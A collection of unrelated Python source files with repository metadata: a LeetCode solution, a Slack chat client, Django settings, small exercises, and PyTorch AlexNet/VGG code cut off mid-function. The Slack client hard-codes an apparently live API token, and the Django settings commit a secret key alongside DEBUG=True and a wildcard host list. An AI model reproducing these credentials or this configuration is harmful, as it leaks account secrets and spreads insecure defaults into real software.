63cde813e382083838bf95c063efdad27061a475 | 821f403a3afc9055d40893eca033c369a4c3831e | /Medium/No106i.py | 7aea7f5abcf3edf0b212fbd8f021e53b5dee52af | [] | no_license | kikihiter/LeetCode2 | 29f91b6992a01ba23e7da04b2b2c862410cc563b | 7167f1a7c6cb16cca63675c80037682752ee2a7d | refs/heads/master | 2023-05-01T03:45:44.482932 | 2021-05-19T13:12:16 | 2021-05-19T13:12:16 | 277,283,525 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def buildTree(self, inorder, postorder):
        """Rebuild a binary tree from its inorder and postorder traversals.

        Assumes tree values are unique (LeetCode 106 guarantee).
        Replaces the O(n^2) version (inorder.index() plus list slicing per
        node) with an O(n) value->position map and a postorder cursor.

        :type inorder: List[int]
        :type postorder: List[int]
        :rtype: TreeNode
        """
        if not inorder:
            return None
        # Value -> inorder position for O(1) root lookups.
        index_of = {val: i for i, val in enumerate(inorder)}
        # Cursor into postorder, consumed right-to-left (root first).
        # One-element list keeps it writable inside the closure (py2-safe).
        cursor = [len(postorder) - 1]

        def build(lo, hi):
            # Build the subtree covering inorder[lo..hi] inclusive.
            if lo > hi:
                return None
            root_val = postorder[cursor[0]]
            cursor[0] -= 1
            root = TreeNode(root_val)
            mid = index_of[root_val]
            # Right subtree first: postorder is consumed from the end.
            root.right = build(mid + 1, hi)
            root.left = build(lo, mid - 1)
            return root

        return build(0, len(inorder) - 1)
"noreply@github.com"
] | kikihiter.noreply@github.com |
f3a6a0ba64b51db85a8cfef0164e1771578398eb | c91e96406016aa36aea19184ac1a18e5b35dac90 | /api/slack.py | efcc173acfed2c164b9fe2a54d986c226882ff2e | [] | no_license | pdelkowski/pyslacker | dc0c34ed353357eff7abe86978ce5b2e5b620c23 | bd33eec683d6b1483c9355be5ea4a188d2670fb6 | refs/heads/master | 2021-01-20T19:34:42.499805 | 2016-08-22T17:21:55 | 2016-08-22T17:21:55 | 62,735,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,143 | py | import websocket
import thread
import threading
import requests
import json
from utils.logger import AppLogger
from models.user import UserManager
from models.room import RoomManager
from models.message import MessageManager, Message
from models.exception import UserNotFoundError
class SlackApi:
    """Slack RTM client: fetches initial state over HTTP, then listens on a
    websocket in a background thread and pushes incoming messages onto the
    supplied chat queue.

    NOTE: this file is Python 2 (`print` statements, dict.iteritems,
    the `thread` module).
    NOTE(review): a real API token is hard-coded below and the `token`
    constructor argument is ignored - the token should be rotated and
    read from configuration.
    """
    # HTTP verbs accepted by _request().
    GET = 'get'
    POST = 'post'
    def __init__(self, ui, users_table, chat_queue, token=None):
        self.logger = AppLogger.get_logger()
        self.UI = ui
        # NOTE(review): hard-coded credential; `token` parameter is unused.
        self._token = 'xoxp-4098964602-4096552845-19491432598-2b27154c5c'
        self._chat_queue = chat_queue
        # rtm.start returns the websocket URL plus users/channels/groups/self.
        init_data = self._get_ws_basic_data()
        ws_url = self._get_ws_url(init_data)
        self.users = self._get_init_users(init_data)
        self._channels = self._get_init_channels(init_data)
        self._groups = self._get_init_groups(init_data)
        self._profile = self._get_init_profile(init_data)
        # Processing initial data
        self._process_init_users(init_data)
        self._process_init_channels(init_data)
        self._process_init_groups(init_data)
        self.logger.info("$$$ INTIAL DATA")
        self.logger.info(init_data)
        self.logger.info(self.users)
        self.logger.info(self._channels)
        self.logger.info(self._profile)
        # ADDING USERS !!!
        # self.UI.USERS.add_many(self.users)
        users_table.add_many(self.users)
        # Run the websocket event loop on a daemonless background thread.
        self._ws = websocket.WebSocketApp(ws_url,
                                          on_message=self._api_on_message,
                                          on_error=self._api_on_error,
                                          on_close=self._api_on_close)
        self._ws.on_open = self._api_on_open
        self.logger.debug("="*160)
        self.logger.debug("PRE thread start")
        self._ws_thread = threading.Thread(target=self._ws.run_forever)
        self._ws_thread.start()
        self.logger.debug("POST thread start")
        # self._ws.run_forever()
    def _request(self, met, url, params=None):
        # Thin logging wrapper around requests.get/post.
        # NOTE(review): if `met` is neither 'get' nor 'post', `r` is unbound
        # and the r.json() call below raises NameError.
        req_params = None
        if params is not None:
            req_params = '&'.join(['{}={}'.format(k, v)
                                   for k, v in params.iteritems()])
        if met == 'get':
            r = requests.get(url, req_params)
        if met == 'post':
            r = requests.post(url, req_params)
        self.logger.debug("REQUEST: "+url+" PARAMS: "+str(req_params))
        response_log = str(r.json())
        self.logger.debug("RESPONSE: "+response_log)
        return r
    def _get_ws_basic_data(self):
        # Call rtm.start to obtain the websocket URL and initial team state.
        url = 'https://slack.com/api/rtm.start?token='+self._token
        # r = requests.get(url)
        r = self._request(self.GET, url)
        if r.status_code != 200:
            raise Exception("Could not connect to Slack HTTP API")
        return r.json()
    def _get_ws_url(self, data):
        # Extract the websocket endpoint from the rtm.start payload.
        return data['url']
    def _process_init_channels(self, data):
        # Register every public channel with the global RoomManager.
        chnls = data['channels']
        for channel in chnls:
            chnl_id = channel['id']
            chnl_name = channel['name']
            chnl_type = 'channel'
            RoomManager.add_room(chnl_type, chnl_id, chnl_name)
    def _get_init_channels(self, data):
        # Reduce the channel payload to {name, id, type} dicts.
        chnls = data['channels']
        channels = []
        for channel in chnls:
            c_dict = {'name': channel['name'], 'id': channel['id'],
                      'type': 'channel'}
            channels.append(c_dict)
        return channels
    def _process_init_groups(self, data):
        # Register every private group with the global RoomManager.
        chnls = data['groups']
        for channel in chnls:
            chnl_id = channel['id']
            chnl_name = channel['name']
            chnl_type = 'group'
            RoomManager.add_room(chnl_type, chnl_id, chnl_name)
    def _get_init_groups(self, data):
        # Reduce the group payload to {name, id, type} dicts.
        chnls = data['groups']
        groups = []
        for channel in chnls:
            c_dict = {'name': channel['name'], 'id': channel['id'],
                      'type': 'group'}
            groups.append(c_dict)
        return groups
    def _process_init_users(self, data):
        # Register every team member with the global UserManager.
        usrs = data['users']
        for user in usrs:
            user_id = user['id']
            user_name = user['name']
            user_real_name = user['profile']['real_name_normalized']
            UserManager.add_user(user_id, user_name, user_real_name, None)
    def _get_init_users(self, data):
        # Reduce the user payload to {name, full_name, presence, id} dicts.
        usrs = data['users']
        users = []
        for user in usrs:
            u_dict = {'name': user['name'],
                      'full_name': user['profile']['real_name_normalized'],
                      'presence': user['presence'], 'id': user['id']}
            users.append(u_dict)
        return users
    def _get_init_profile(self, data):
        # Identity of the authenticated user ('self' in the payload).
        profile = {'name': data['self']['name'], 'id': data['self']['id']}
        return profile
    def _api_on_message(self, ws, message):
        # Websocket callback: parse the event and, for chat messages,
        # resolve/register the sender and enqueue a Message object.
        self.logger.info('INCOMING MESSAGE')
        self.logger.info(str(message))
        msg_obj = json.loads(message)
        if msg_obj['type'] == 'message':
            chnl = msg_obj['channel']
            if 'user' in msg_obj:
                user_id = msg_obj['user']
            elif 'bot_id' in msg_obj:
                user_id = msg_obj['bot_id']
            else:
                raise UserNotFoundError("Could't find user id")
            user = UserManager.find(user_id)
            if user is None:
                user = UserManager.create(user_id, msg_obj['username'])
            self.logger.info("New message hook")
            msg = Message(chnl, msg_obj['text'], user_id, msg_obj['ts'])
            self._chat_queue.append_msgs(msg)
        else:
            self.logger.info("Unknown hook")
        # print '%%%%%%%%%%%% MESSAGE %%%%%%%%%%%%'
        # print message
    def _api_on_error(self, ws, error):
        # Websocket error callback (stdout only).
        print '%%%%%%%%%%%% ERROR %%%%%%%%%%%%'
        print error
    def _api_on_close(self, ws):
        # Websocket close callback (stdout only).
        print "### closed ###"
    def _api_on_open(self, ws):
        # Websocket open callback: flag the UI as connected.
        self.UI.change_status('Connected')
        def run(*args):
            self.UI.change_status('Connected')
            # j = send_dummy_msg(channels[0]['id'])
            # ws.send(j.encode('utf-8'))
            # for i in range(3):
            # time.sleep(1)
            # # ws.send("Hello %d" % i)
            # time.sleep(1)
            # ws.close()
            # print "thread terminating..."
        thread.start_new_thread(run, ())
    def _retrieve_identity(self):
        # Fetch the auth.test payload for the configured token.
        url_base = "https://slack.com/api/"
        url_action = 'auth.test?'
        url_token = "token=" + str(self._token)
        url = url_base + url_action + url_token
        r = self._request(self.GET, url)
        if r.status_code != 200:
            raise Exception("Could not connect to Slack HTTP API")
        self.logger.info("REQUEST RESPONSE: auth.test" + str(r.json()))
        return r.json()
    def get_identity(self):
        # Lazily fetch and cache the auth.test identity payload.
        if hasattr(self, '_identity') is False:
            self._identity = self._retrieve_identity()
        return self._identity
    def get_rooms(self):
        # Public channels captured at startup.
        return self._channels
    def get_groups(self):
        # Private groups captured at startup.
        return self._groups
    def get_messages(self, room, count=200):
        # Fetch up to `count` history entries for `room` and wrap each one
        # in a Message; unknown bot senders are registered on the fly.
        url_base = "https://slack.com/api/"
        if room.room_type == 'channel':
            url_action = 'channels.history?'
        elif room.room_type == 'group':
            url_action = 'groups.history?'
        else:
            raise NameError('Cannot retrieve messages of unknown type')
        url_token = "token=" + str(self._token)
        url_channel = "&channel=" + str(room.hash_id) + "&count=" + str(count)
        url = url_base + url_action + url_token + url_channel
        r = self._request(self.GET, url)
        if r.status_code != 200:
            raise Exception("Could not connect to Slack HTTP API")
        self.logger.info("REQUEST RESPONSE: channels.history" + str(r.json()))
        msgs = []
        room_id = room.hash_id
        for obj in r.json()['messages']:
            self.logger.info("abcdef" + str(obj))
            if 'user' in obj:
                user_id = obj['user']
            elif 'bot_id' in obj:
                user_id = obj['bot_id']
                if UserManager.find(user_id) is None:
                    UserManager.add_user(user_id, obj['username'])
            else:
                raise UserNotFoundError("Unknown type of user")
            msg = Message(room_id, obj['text'], user_id, obj['ts'])
            msgs.append(msg)
        return msgs # r.json()
    def send_message(self, message):
        # Post `message.text` to its room via chat.postMessage.
        # NOTE(review): the text is interpolated into the URL unescaped -
        # special characters (&, #, spaces...) will corrupt the request.
        url_base = "https://slack.com/api/"
        url_action = 'chat.postMessage?'
        url_token = "token=" + str(self._token)
        url_channel = "&channel=" + str(message.room.hash_id) + "&text=" + str(message.text)
        url = url_base + url_action + url_token + url_channel
        self.logger.info("SEND MSG REQUEST " + str(url))
        r = self._request(self.GET, url)
        if r.status_code != 200:
            raise Exception("Could not connect to Slack HTTP API")
        self.logger.info("REQUEST RESPONSE: channels.history" + str(r.json()))
        return r.json()
| [
"p.delkowski@gmail.com"
] | p.delkowski@gmail.com |
a27f8a589fcb294a628b2ce89906de9bf3a88c12 | c2729192562355162c43c44266b0eef282cfcfa4 | /mysite/mysite/settings.py | 97f0872832ac8ba9e26d43925067db6c6db1afce | [] | no_license | lamngocchien/history | 1d678e0fe9a9e6441220c88c1bfc9e9f5457440c | 411e1bc18d644049cd0390b2b6ac52a1647b10a6 | refs/heads/master | 2020-04-14T04:57:20.481422 | 2019-01-01T17:48:51 | 2019-01-01T17:48:51 | 163,650,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,927 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.16.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# import utils
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control - rotate it and
# load it from the environment before any production deployment.
SECRET_KEY = 'bfkeb55k$cau#+nwf_z4s7l1)r13rv=8rhb4uclxiznlvj=wt5'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Custom 404 handling is active only when Django's debug pages are off.
# (Replaces a redundant if/else that assigned the same derived value.)
DEBUG404 = not DEBUG

RUN_ON_WINDOWS_OS = True  # For django running in Windows
WINDOWS_APPLICATION_UNAUTH = True  # For Skip auth to login django/admin

ALLOWED_HOSTS = ["127.0.0.1", "*"]
# Application definition
INSTALLED_APPS = [
'suit',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'polls',
'polls.apps.PollsConfig',
]
# from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
# TEMPLATE_CONTEXT_PROCESSORS = TCP + (
# 'django.core.context_processors.request',
# )
# Django Suit configuration example
SUIT_CONFIG = {
'ADMIN_NAME': 'DATABASE',
'HEADER_DATE_FORMAT': 'l, j. F Y',
'HEADER_TIME_FORMAT': 'H:i',
'SHOW_REQUIRED_ASTERISK': True,
'CONFIRM_UNSAVED_CHANGES': True,
'MENU_EXCLUDE': ('auth.group',),
'MENU_OPEN_FIRST_CHILD': True,
'MENU': (
# Keep original label and models
{'label': 'CorePyTool', 'icon':'icon-cog', 'url': '/'},
# 'sites',
# Rename app and set icon
{'app': 'auth', 'label': 'Authorization', 'icon':'icon-lock'},
)
}
FILE_UPLOAD_HANDLERS = ['django.core.files.uploadhandler.TemporaryFileUploadHandler']
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
# Template engine configuration.
# Fix: 'django.core.context_processors.request' was removed in Django 1.10,
# so on this Django 1.11 project it raised ImportError at template rendering
# time - and it duplicated the correct
# 'django.template.context_processors.request' entry kept below.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # 'DIRS': ['C:/install/mysite/templates'],
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# 'NAME': 'C:/install/mysite/db.sqlite3',
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
# STATIC_URL = '/static/'
STATIC_PATH = os.path.join(BASE_DIR,'static')
STATIC_URL = '/static/' # You may find this is already defined as such.
STATICFILES_DIRS = (
STATIC_PATH,
)
# Logging setting
import sys
# dictConfig-style logging: verbose console output for the 'polls' and
# 'utils' loggers; the file handler and the root 'django' logger are kept
# below as commented-out templates.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
            'datefmt': "%d/%b/%Y %H:%M:%S"
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    'handlers': {
        # 'file': {
        #     'level': 'ERROR',
        #     'class': 'logging.FileHandler',
        #     'filename': '/var/log/django_practices.log',
        #     'formatter': 'verbose'
        # },
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'stream': sys.stdout,
            'formatter': 'verbose'
        },
    },
    'loggers': {
        # 'django': {
        #     'handlers': ['console'],
        #     'propagate': True,
        #     'level': 'DEBUG',
        # },
        'polls': {
            'handlers': ['console'],
            'level': 'DEBUG',
        },
        'utils': {
            'handlers': ['console'],
            'level': 'DEBUG',
        },
    }
}
# DEBUG_TEMPLATE = False
# for i in range(0, len(TEMPLATES) - 1):
# TEMPLATES[i]['OPTIONS']['debug'] = DEBUG_TEMPLATE
| [
"lamngocchien@gmail.com"
] | lamngocchien@gmail.com |
2ae03a8811d0a424c3f3e1ee310d19da161a3b46 | cb60befefb7f6b9c8cfe3a75d1274190946fe20c | /1_Nguyen_Trong_Thiep/Ex 1/1.6.py | 4ad3ed570fad85595e4c08e8d0e6ce80e11b9a8d | [
"MIT"
] | permissive | thephong45/student-practices | 06da78c1cd677559cb1bb00ade1f849c3a2d4cf1 | 50704cedce5d893bfa47b4bf6d228f974d0d5768 | refs/heads/master | 2022-11-20T07:31:57.478309 | 2020-07-17T11:45:26 | 2020-07-17T11:45:26 | 279,014,002 | 0 | 0 | MIT | 2020-07-12T07:25:49 | 2020-07-12T07:25:48 | null | UTF-8 | Python | false | false | 915 | py | # Write a guessing game where the user has to guess a secret number. After every guess the program tells the user
# whether their number was too large or too small. At the end the number of tries needed should be printed. It counts
# only as one try if they input the same number multiple times consecutively
import random

# Secret number and game state. Per the spec in the header comments, the
# number of tries must be reported, and consecutively re-entering the same
# number counts as a single try.
rand = random.randint(1, 10)
history = []      # distinct guessed numbers, in order of first appearance
tries = 0
last_guess = None  # previous accepted guess, to collapse consecutive repeats
while True:
    n = input("Nhap vao so n trong khoang 1 den 10: ")
    while not n.isdigit():
        print("Your input is not a number, please try again")
        n = input()
    n = int(n)
    # FIX: count tries; the same number entered multiple times in a row
    # only counts once (original code never counted tries at all).
    if n != last_guess:
        tries += 1
        last_guess = n
    # FIX: dedupe unconditionally — the original appended the winning
    # guess even when it was already in history.
    if n not in history:
        history.append(n)
    if n < rand:
        print("So ban nhap qua nho")
    elif n > rand:
        print("So ban nhap qua lon")
    else:
        print("Ban da doan dung")
        break
print("So lan doan:", tries)
print("Cac so ban da doan", history)
| [
"thienphong183@gmail.com"
] | thienphong183@gmail.com |
48da51e760e6da59f32febf9cde6a947531baee8 | aa4189aa0eef91371be009ee2c8bcb31aeabcde9 | /Lib/BoxEntity/BoxAddress.py | 467291260e323a98d5e783e22f9c00859ac513e4 | [] | no_license | break11/AutoStorage | fd2ac6a50e3223d2ec8d5d4ec0cb3f7d9c491630 | a336b7ea0fa7e41a8c7410a4ab6e37530477b618 | refs/heads/transporter_line | 2023-04-07T03:18:56.273261 | 2020-04-15T13:52:43 | 2020-04-15T13:52:43 | 264,171,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | from enum import auto
from Lib.Common.BaseEnum import BaseEnum
from Lib.Common.BaseTypes import CСompositeType
import Lib.GraphEntity.StorageGraphTypes as SGT
from Lib.Common.StrConsts import genSplitPattern
MDS = "="
MDS_split_pattern = genSplitPattern( MDS )
class EBoxAddressType( BaseEnum ):
OnNode = auto()
OnEdge = auto()
OnAgent = auto()
Undefined = auto()
Default = OnNode
################################
class CBoxAddress( CСompositeType ):
baseType = EBoxAddressType
dataFromStrFunc = {
EBoxAddressType.Undefined : lambda sData : sData,
EBoxAddressType.OnNode : SGT.SNodePlace.fromString,
EBoxAddressType.OnEdge : SGT.SEdgePlace.fromString,
EBoxAddressType.OnAgent : lambda sData : sData,
}
dataType_by_BaseType = {
EBoxAddressType.OnNode : SGT.SNodePlace,
EBoxAddressType.OnEdge : SGT.SEdgePlace,
EBoxAddressType.OnAgent : str
}
| [
"break1@yandex.ru"
] | break1@yandex.ru |
035293505b05a1c0ee88e5801f7e709f5f12634d | e03f502312775b01b41ea7c6f5cb3dfbafdb8509 | /orders/migrations/0007_auto_20180821_2324.py | 4e2f107876fafa52fbf630f534026efeac00a8f4 | [] | no_license | Grechanin/Misteckiy-DjangoRest-React-Redux | e223e89310362b8c21e30c8c669d4e170d232db6 | f05eb50a6aec72432716672294df81c3dc939ddd | refs/heads/master | 2020-04-13T10:58:17.931584 | 2019-02-18T09:21:54 | 2019-02-18T09:21:54 | 163,159,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-08-21 20:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orders', '0006_auto_20180816_2353'),
]
operations = [
migrations.AlterField(
model_name='order',
name='email',
field=models.EmailField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='order',
name='name',
field=models.CharField(default=None, max_length=128, verbose_name="І'мя"),
),
]
| [
"grechanin@gmail.com"
] | grechanin@gmail.com |
330c2266c59aa5b0280dcb87f1f900fadd9d71ee | 9ca90771f4c0002367909dfac6a8316afb77cbbb | /Python/Strings/MergeTheTools.py | e59a42fccab75893f65bd549751948ffdd3c61f1 | [] | no_license | jugal-chauhan/Hackerrank-Solutions | f4892562ba6ee2f9bdcc0ac219f5fb8f2befaad8 | 069bfe075f830fa5424cedf87a39571ea3233a08 | refs/heads/master | 2022-10-17T18:13:05.142405 | 2020-06-12T06:37:17 | 2020-06-12T06:37:17 | 262,621,630 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | # @author: Jugal Chauhan
def merge_the_tools(string, k):
# your code goes here
n = len(string)
for i in range(0, n, k):
dic = {}
res = ""
for c in string[i:i+k]:
if c not in dic:
dic[c] = 1
res += c
print(res)
if __name__ == '__main__':
    # HackerRank input format: the string on the first line, k on the second.
    string, k = input(), int(input())
    merge_the_tools(string, k)
"jugaldc2000@gmail.com"
] | jugaldc2000@gmail.com |
8192c3927678dfacb700c871e74e68ba1dcf73e3 | ec54f4d79af7f1833246d2c65b82047a04777f61 | /9_2_Python_RPC/myled_write.py | fa0a5f163894dc5f951febfdf7c37a196f566808 | [] | no_license | 106061221/mbed09 | e5d1d9b1eaac4b8d9f4d0fc48e655bedc246e4f0 | 6c5d9e664e4b5145e6c56b96909bc912ba2fa004 | refs/heads/master | 2022-07-17T15:59:15.434661 | 2020-05-19T19:32:27 | 2020-05-19T19:32:27 | 265,251,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | import serial
import time
serdev = '/dev/ttyACM0' # use the device name you get from `ls /dev/ttyACM*`
s = serial.Serial(serdev)
s.write(bytes("/myled/write 1\r", 'UTF-8'))
line=s.readline() # Read an echo string from K66F terminated with '\n' (pc.putc())
print(line)
line=s.readline() # Read an echo string from K66F terminated with '\n' (RPC reply)
print(line)
time.sleep(1)
s.write(bytes("/myled/write 0\r", 'UTF-8'))
line=s.readline() # Read an echo string from K66F terminated with '\n' (pc.putc())
print(line)
line=s.readline() # Read an echo string from K66F terminated with '\n' (RPC reply)
print(line)
s.close()
| [
"rio714tw@gmail.com"
] | rio714tw@gmail.com |
91d6925dede4b4de9e1b6bcceaa9f0f14a515b34 | c5789b6576ac914ce7269834b6a288ad8fe418a0 | /TaskSets/filtering_task_set.py | d0f9252754e47559c8f3a74b9271c66804008764 | [
"Apache-2.0"
] | permissive | utkarsh7236/SCILLA | 3ebdd2cef7dc65061e4ae334a0c6b50efc052aa7 | e11e4d753823ad522a1b3168283b6e6ffe3ea393 | refs/heads/master | 2022-08-03T18:06:01.905309 | 2020-05-27T08:29:07 | 2020-05-27T08:29:07 | 264,383,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #!/usr/bin/env python
from TaskSets import TaskSet
#====================================================
class FilteringTaskSet(TaskSet):
    """Task set for the 'filtering' task type; runs at most once."""

    def __init__(self, settings):
        TaskSet.__init__(self, settings['name'])
        # Tag the caller-supplied settings dict (mutated in place, as the
        # base class consumers expect) and keep a reference to it.
        settings['task_type'] = 'filtering'
        self.settings = settings
        self.task_type = 'filtering'
        self.max_exec = 1
"utkarsh7236@gmail.com"
] | utkarsh7236@gmail.com |
af88d0dccf501fa8929fa52b4934f51aba2e0097 | 2afa9eb1e2f974600c9fe1cc78dd20a6aed88369 | /cv/network.py | ba29bebc0115d1d3c780c942d7236be4ef5a362b | [] | no_license | Coldog2333/worker | 1ea4d960cae3ae5e8b27c403c215ef20e9be6af4 | 4e5815b970f2b2ff6a5bc2ee9a95f0e3118e79a3 | refs/heads/master | 2023-04-01T06:08:55.075097 | 2021-04-15T22:30:48 | 2021-04-15T22:30:48 | 358,408,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,137 | py | import torch
import torch.nn as nn
import torch.utils.data
from cv.data_provider import load_glove_embedding, Flickr_Dataset
from cv.config import *
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
class AlexNet(nn.Module):
    """AlexNet backbone.

    Args:
        num_classes: size of the final classification layer.
        output_feat: when True, ``forward`` returns the flattened
            convolutional features (N, 256*6*6) instead of class scores.
    """

    def __init__(self, num_classes=1000, output_feat=False):
        super(AlexNet, self).__init__()
        self.output_feat = output_feat
        conv_stack = [
            nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=3, stride=2),
            nn.Conv2d(64, 192, kernel_size=5, padding=2),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=3, stride=2),
            nn.Conv2d(192, 384, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(384, 256, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(256, 256, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=3, stride=2),
        ]
        self.features = nn.Sequential(*conv_stack)
        fc_stack = [
            nn.Dropout(),
            nn.Linear(256 * 6 * 6, 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(inplace=True),
            nn.Linear(4096, num_classes),
        ]
        self.classifier = nn.Sequential(*fc_stack)

    def forward(self, x):
        """Run the network; see ``output_feat`` for the two return modes."""
        feats = self.features(x)
        # Flatten the (N, 256, 6, 6) feature map for the linear layers.
        feats = feats.view(-1, 256 * 6 * 6)
        if self.output_feat:
            return feats
        return self.classifier(feats)
class VGG(nn.Module):
    """Generic VGG: a convolutional trunk followed by the standard
    three-layer 4096-unit classifier.

    Args:
        features: feature-extractor module; must produce (N, 512, 7, 7)
            to match the classifier's 512*7*7 input size.
        num_classes: size of the final linear layer.
        init_weights: when True, re-initialise all weights (Kaiming for
            convs, N(0, 0.01) for linears, constants for batch norms).
    """

    def __init__(self, features, num_classes=1000, init_weights=True):
        super(VGG, self).__init__()
        self.features = features
        self.classifier = nn.Sequential(
            nn.Linear(512 * 7 * 7, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, num_classes),
        )
        if init_weights:
            self._initialize_weights()

    def forward(self, x):
        out = self.features(x)
        out = out.view(out.size(0), -1)  # flatten to (N, 512*7*7)
        return self.classifier(out)

    def _initialize_weights(self):
        # Walk every registered sub-module and apply the initialisation
        # scheme appropriate for its type.
        for module in self.modules():
            if isinstance(module, nn.Conv2d):
                nn.init.kaiming_normal_(
                    module.weight, mode='fan_out', nonlinearity='relu')
                if module.bias is not None:
                    nn.init.constant_(module.bias, 0)
            elif isinstance(module, nn.BatchNorm2d):
                nn.init.constant_(module.weight, 1)
                nn.init.constant_(module.bias, 0)
            elif isinstance(module, nn.Linear):
                nn.init.normal_(module.weight, 0, 0.01)
                nn.init.constant_(module.bias, 0)
# VGG layer specifications (torchvision convention): integers are 3x3-conv
# output channel counts, 'M' marks a 2x2 max-pool. 'A'/'B'/'D'/'E' are the
# 11/13/16/19-layer variants; 'E' is the one consumed by vgg19_bn below.
cfg = {
    'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
    'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg19_bn(pretrained=False, cv_weight_file=None, **kwargs):
    """VGG 19-layer model (configuration 'E') with batch normalization.

    Args:
        pretrained (bool): if True, load weights from ``cv_weight_file``.
        cv_weight_file: path to a state-dict checkpoint (required when
            ``pretrained`` is True).
        **kwargs: forwarded to the ``VGG`` constructor.
    """
    # FIX: ``make_layers`` was called but defined nowhere in this module,
    # so this function raised NameError. Restored here (as a local helper)
    # from the torchvision VGG implementation that the ``cfg`` spec above
    # follows: integers become Conv2d(3x3, padding=1) [+BatchNorm] +ReLU,
    # 'M' becomes MaxPool2d(2, 2).
    def make_layers(spec, batch_norm=False):
        layers = []
        in_channels = 3
        for v in spec:
            if v == 'M':
                layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
            else:
                conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
                if batch_norm:
                    layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
                else:
                    layers += [conv2d, nn.ReLU(inplace=True)]
                in_channels = v
        return nn.Sequential(*layers)

    if pretrained:
        # A checkpoint will overwrite the weights anyway.
        kwargs['init_weights'] = False
    model = VGG(make_layers(cfg['E'], batch_norm=True), **kwargs)
    if pretrained:
